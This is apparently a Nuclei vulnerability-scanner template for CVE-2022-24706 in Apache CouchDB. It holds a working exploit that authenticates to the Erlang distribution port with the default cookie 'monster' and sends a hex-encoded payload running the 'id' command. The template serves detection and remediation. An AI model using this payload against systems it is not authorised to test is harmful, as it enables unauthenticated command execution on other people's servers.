nuclei-templates/network/cves/2022/CVE-2022-24706.yaml


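id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
    epss-score: 0.97407
  metadata:
    max-request: 1
    product: couchdb
    shodan-query: product:"CouchDB"
    vendor: apache
    verified: "true"
  tags: cve,cve2022,network,couch,rce,kev

# All payload values are hex-encoded and sent with `type: hex` below.
variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  # The pre-3.2.2 default cookie named in the remediation. A hardened host that
  # uses a different cookie fails the challenge step and the template simply
  # does not match - no "patched" vs "unreachable" distinction is reported.
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - host:
      - "{{Hostname}}"
    # Single fixed port; presumably the Erlang distribution listener as shipped
    # in CouchDB's default configuration. Deployments that moved the listener to
    # another port are not covered - TODO confirm against the target's vm.args.
    port: 9100

    inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024

    # Positive match only when all three tokens appear in the raw response,
    # i.e. output that looks like the result of `id`; a partial or unexpected
    # response is treated as "not vulnerable".
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and

# Upstream signature over the original template bytes. Any edit to this file,
# including re-indentation or added comments, presumably invalidates it and the
# template will load as unsigned - re-sign or drop the line after local changes.
# digest: 4b0a0048304602210093ffb4f5bccf651fa25d037a91e1f0a081fce4f81404fa0d714c336a0cc640ea022100f06fe4191cb5cc0c7d8e71028302e622776af1f07dc61a6450aa8f711752049d:922c64590222798bb761d5b6d8e72950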